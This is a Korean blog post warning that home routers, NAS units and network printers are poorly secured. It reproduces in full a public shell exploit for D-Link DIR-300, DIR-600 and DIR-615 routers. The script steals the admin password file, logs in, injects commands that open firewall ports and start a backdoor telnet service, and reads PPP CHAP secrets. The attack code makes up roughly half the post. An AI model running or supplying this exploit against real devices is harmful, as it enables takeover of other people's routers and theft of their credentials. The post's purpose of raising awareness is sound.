엔드포인트(Endpoint)는 네트워크 맨 끝부분에 연결된 장비를 의미하며, 대표적으로 PC, 스마트폰 등을 들 수 있다. 따라서 보통 기업이나 보안 솔루션의 입장에서는 엔트포인트 프로텍션이라고 하는 용어를 통해 보호할 수 있다고 표현하기도 한다.


하지만, 실제로 PC나 모바일 장비의 경우 어느정도 보안 솔루션이 제공되고 이를 통해 대부분의 위협을 예방 및 해결할 수 있다.


하지만, 가정이나 조그만 회사(SOHO)에서 볼 때 간과되고 있는 부분이 있는데 바로 홈엔드포인트(이 용어는 필자가 엔드포인트라는 기존의 의미와 구별하기 위해 세계 최초로 사용한 단어... 는 아님)


대표적인 예를 들면, 집과 같은 작은 네트워크에서 사용하는 라우터(IP 공유기, AP 등), NAS와 같은 스토리지, 애플TV와 같은 미디어 관련 장치 그리고 네트워크 프린터 등을 들 수 있다.


피해사례를 열거해 보면,


* 라우터 : 내부 네트워크 침입, 라우터의 취약점을 통한 대규모 DDoS 등 공격 유발 가능성.

* NAS: 내부 정보(사진, 동영상(!) ) 유출

* 네트워크 프린터: 내부 정보 유출


우리가 보통 많이 사용하는 IP 공유기는 실제로 몇만원 짜리를 사용하고 있으며, 제품의 가격과 동일하게(!) 보안적 측면이 매우 간과되어 있는 경우가 많다. 물론, 보안 전문 업체가 개발 판매하는 제품은 어느정도 신뢰할 수 있지만, 실제 가정에서는 사용하는 경우가 없다!


아래 자료는 D-Link 사에서 판매하는 라우터 제품의 취약점이 공개된 사례로, DIR-300 시리지의 전체 펌웨어, DIR-600 시리즈 전체, DIR-615(펌웨어 4.0 버전) 등에서 동작하는 공격 코드이다.


General info:
=============
A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin.

knock knock
===========
-- cut
#!/bin/sh


if [ -z "$1" ]; then
        echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
        echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
        echo "usage: $0 [router address] [telnet port]";
        exit 0;
fi;

if [ -z "$2" ]; then
        TPORT=3333;
else
        TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
        L=`echo $HTTPASSWD | cut -d' ' -f1`;
        P=`echo $HTTPASSWD | cut -d' ' -f2`;

        echo "found username: $L";
        echo "found password: $P";


        curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null;

        if [ $? -eq 0 ]; then
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
                curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

                echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
                curl -sS "http://$1/logout.php" 1>/dev/null;
        fi
fi

CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`;

if [ ! -z "$CHAP" ]; then
        echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

-- cut

Credits:
========
echo $use_the_source_luke

____________________________________________________________
FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on your desktop!

Check it out at http://www.inbox.com/marineaquarium


이제는 좀더 신경써야 할 부분이 더 늘어나고 있다. 가장 좋은 방안은 선을 끊는 것이 아닐까?



reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus


    Web Analytics Blogs Directory